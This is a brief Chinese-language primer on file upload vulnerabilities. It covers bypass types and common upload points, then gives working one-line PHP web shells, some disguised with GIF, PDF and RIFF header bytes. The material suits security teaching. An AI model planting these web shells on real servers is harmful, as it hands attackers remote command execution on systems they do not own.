文件上传安全
文件上传安全概述
1. 文件上传漏洞定义
文件上传漏洞是指网站对用户上传的文件没有进行严格的验证和过滤,导致攻击者可以上传恶意文件(如WebShell、木马等),从而获取服务器控制权或执行恶意代码。
2. 攻击特点
- 绕过文件类型验证
- 绕过文件内容验证
- 绕过文件大小限制
- 绕过文件路径验证
- 绕过文件权限验证
3. 常见攻击场景
- 头像上传
- 文件分享
- 图片上传
- 文档上传
- 视频上传
// 攻击场景示例
1. 上传WebShell
<?php eval($_POST['cmd']); ?>
2. 上传木马
<?php system($_GET['cmd']); ?>
3. 上传恶意图片
GIF89a<?php system($_GET['cmd']); ?>
4. 上传恶意文档
%PDF-1.4
<?php system($_GET['cmd']); ?>
5. 上传恶意视频
RIFF<?php system($_GET['cmd']); ?>